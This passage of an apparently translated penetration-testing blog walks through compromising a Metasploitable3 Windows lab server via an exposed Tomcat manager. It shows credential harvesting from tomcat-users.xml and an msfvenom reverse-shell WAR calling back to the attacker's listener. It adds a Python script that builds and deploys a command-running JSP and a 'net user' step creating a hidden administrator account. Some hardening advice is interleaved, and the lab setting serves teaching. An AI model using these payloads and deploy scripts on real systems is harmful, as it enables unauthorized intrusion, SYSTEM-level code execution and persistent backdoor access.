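        password="6f1a2b3c4d5e6f70$10000$e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
        roles="manager-script"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
</tomcat-users>
"""


def _localname(tag):
    """Strip the XML namespace: '{http://tomcat.apache.org/xml}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per user holding a privileged role.

    Each finding is {"user", "roles", "issues"}; an empty issues list means
    the account has a privileged role but nothing obviously wrong with its
    stored credential.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _localname(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name") or ""
        password = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES
        if not privileged:
            continue   # accounts without manager/admin roles are out of scope here
        issues = []
        if not DIGEST_RE.match(password):
            issues.append("plaintext-password")
        if password.lower() == name.lower():
            issues.append("password-equals-username")
        if "plaintext-password" in issues and len(password) < 12:
            issues.append("short-password")
        findings.append({"user": name, "roles": sorted(privileged), "issues": issues})
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_TOMCAT_USERS
    for f in audit_tomcat_users(text):
        print("%-10s roles=%s issues=%s" % (f["user"], ",".join(f["roles"]),
                                            ",".join(f["issues"]) or "none"))
```

Run it against the real file pulled back through weevely. The corresponding hardening on Tomcat 8 is to add a `<CredentialHandler className="org.apache.catalina.realm.MessageDigestCredentialHandler" algorithm="SHA-256"/>` inside the Realm and store digests generated with `bin/digest.bat`, to give manager-gui and manager-script to separate accounts, and, for the second problem, to set NTFS permissions on conf\ so that only the Tomcat service account and administrators can read it; LOCAL SERVICE had no business reading it.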

Now let's look at server.xml to see which port the service is listening on, although we could also check the nmap scan results.

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ more server.xml
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0
------------------------------------------------->
    <!-- A "Connector" represents an endpoint by which requests are received
         and responses are returned. Documentation at :
         Java HTTP Connector: /docs/config/http.html (blocking & non-blocking)
         Java AJP  Connector: /docs/config/ajp.html
         APR (HTTP/AJP) Connector: /docs/apr.html
         Define a non-SSL/TLS HTTP/1.1 Connector on port 8080
    -->
    <Connector port="8282" protocol="HTTP/1.1"
               connectionTimeout="20000"
               redirectPort="8443" />
    <!-- A "Connector" using the shared thread pool-->
    <!--
<--------------------------------------------
metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ 

As we can see, the HTTP connector is on port 8282 (the comment in the file still says 8080, but the port attribute is what counts), exactly as nmap detected. Now we go to that address and try to log in with the credentials obtained earlier.

First we go to the server address on port 8282, then click "Manager App" and enter the credentials when prompted.

[Image: Exploit]

Now that we have access to the Tomcat manager, we can create a WAR file and upload it.

[Image: war file]

We will create a WAR backdoor with msfvenom and, once created, unpack it to see where the .jsp file we need is located.

[edu4rdshl@blackarch ~]$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=8443 -f war > shell.war

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of war file: 52150 bytes

[edu4rdshl@blackarch ~]$ ls
Desktop  Downloads  Git  Scripts  bin  go  interactive.php  perl5  scripts  shell.php  shell.war

[edu4rdshl@blackarch ~]$ unzip shell.war 
Archive:  shell.war
   creating: META-INF/
  inflating: META-INF/MANIFEST.MF    
   creating: WEB-INF/
  inflating: WEB-INF/web.xml         
  inflating: zzrsxegmgziw.jsp        
[edu4rdshl@blackarch ~]$ 

Now we upload the file and click "Deploy"; once done, a message confirms that everything went well.

[Image: deploy]

Now we set netcat listening for connections with the command:

[edu4rdshl@blackarch ~]$ nc -lvnp 8443

Finally we browse to the link containing the .jsp file, in our case: http://192.168.1.70:8282/shell/zzrsxegmgziw.jsp
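The unzip output shows what msfvenom actually produced: a manifest, an empty web.xml and one JSP. The following added example (not code from the original post or from Metasploit) builds the same structure by hand and deploys it through the manager's text interface. The JSP only runs `whoami` and echoes the result, which is enough to show which account Tomcat runs as; `build_war()` runs offline, while `deploy_war()` assumes a reachable manager at a URL like http://192.168.1.70:8282 and an account with the manager-script role, which the `sploit` user on this page does not have (it only has manager-gui, hence the HTML form in the post).

```python
"""Build a WAR like the one msfvenom produced and deploy it via the Tomcat manager.

Added example, not code from the original post or from Metasploit.  The JSP
only runs `whoami` and echoes the result; build_war() runs offline,
deploy_war() assumes a reachable manager and a manager-script account.
"""
import base64
import io
import zipfile
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed JSP: one fixed command, no parameters, so it is not a general shell.
WHOAMI_JSP = """<%@ page import="java.io.*" %>
<%
    Process p = Runtime.getRuntime().exec("whoami");
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) {
        out.println(line);
    }
%>
"""

# Minimal deployment descriptor; a JSP needs no servlet mapping.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
</web-app>
"""


def build_war(jsp_name, jsp_source):
    """Return the bytes of a WAR holding META-INF/MANIFEST.MF, WEB-INF/web.xml and one JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n\r\n")
        z.writestr("WEB-INF/web.xml", WEB_XML)
        z.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """Sorted member names, the same view `unzip` gave of shell.war in the post."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return sorted(z.namelist())


def war_member(war_bytes, name):
    """Text content of one member, to confirm the JSP went in unchanged."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return z.read(name).decode("utf-8")


def deploy_war(manager_base, username, password, context_path, war_bytes, timeout=10):
    """PUT the WAR to the manager text interface; returns Tomcat's one-line reply.

    Tomcat answers 401 for bad credentials and 403 when the user lacks the
    manager-script role, which is why the post used the HTML manager instead.
    """
    url = "%s/manager/text/deploy?path=%s&update=true" % (manager_base.rstrip("/"), context_path)
    token = base64.b64encode(("%s:%s" % (username, password)).encode()).decode()
    req = Request(url, data=war_bytes, method="PUT",
                  headers={"Authorization": "Basic " + token,
                           "Content-Type": "application/octet-stream"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.read().decode(errors="replace").strip()
    except HTTPError as e:
        hint = {401: "bad credentials", 403: "manager-script role required"}.get(e.code, e.reason)
        return "FAIL - HTTP %d (%s)" % (e.code, hint)


if __name__ == "__main__":
    war = build_war("whoami.jsp", WHOAMI_JSP)
    print(war_entries(war))
    # Assumed target and credentials, matching the values seen on the page.
    print(deploy_war("http://192.168.1.70:8282", "sploit", "sploit", "/check", war))
```

After a successful deploy, http://192.168.1.70:8282/check/whoami.jsp returns the Tomcat service account, and on this host that is the whole story: Tomcat is installed as a service running as SYSTEM, so whatever the manager deploys runs as SYSTEM. The defensive reading is that the manager application should be restricted by address (the `RemoteAddrValve` in its context.xml) or removed from production instances, and the service should run under a dedicated low-privilege account.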

Once opened, we get our shell, and it runs as NT AUTHORITY\SYSTEM, because that is the account the Tomcat service runs under.

[edu4rdshl@blackarch ~]$ nc -lvnp 8443
Connection from 192.168.1.70:49300
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>whoami
whoami
nt authority\system

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>

Now we create an administrator user so we have our own alternative account.

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>net user sechacklabs sechacklabs123 /add
net user sechacklabs sechacklabs123 /add
The command completed successfully.


C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>net localgroup administrators sechacklabs /add
net localgroup administrators sechacklabs /add
The command completed successfully.


C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>

Finally, to reach services that are bound only to localhost (for example 127.0.0.1:32000 in the netstat output above), we would need to add port forwards. RDP on port 3389 is exposed directly, so I will now try to open a remote desktop session from the attacking machine using the credentials of the administrator account created earlier.

[Image: rdesktop]

That's all for now. Note that the shell obtained through Tomcat already runs as NT AUTHORITY\SYSTEM (see the whoami output above), so there is nothing left to escalate on this host; post-exploitation with Metasploit is something we will probably cover later. Who would have imagined that a simple publicly accessible folder, apparently of no importance, could let us do anything we like on the server? Perhaps someone experienced...


About the author

Information security specialist holding the OSCP certification, expert in online privacy and security techniques, cryptography analyst, founder of Security Hack Labs. BlackArch Linux developer. Twitter: @edu4rdshl XMPP: edu4rdshl@conversations.im Threema ID: 736WU8VV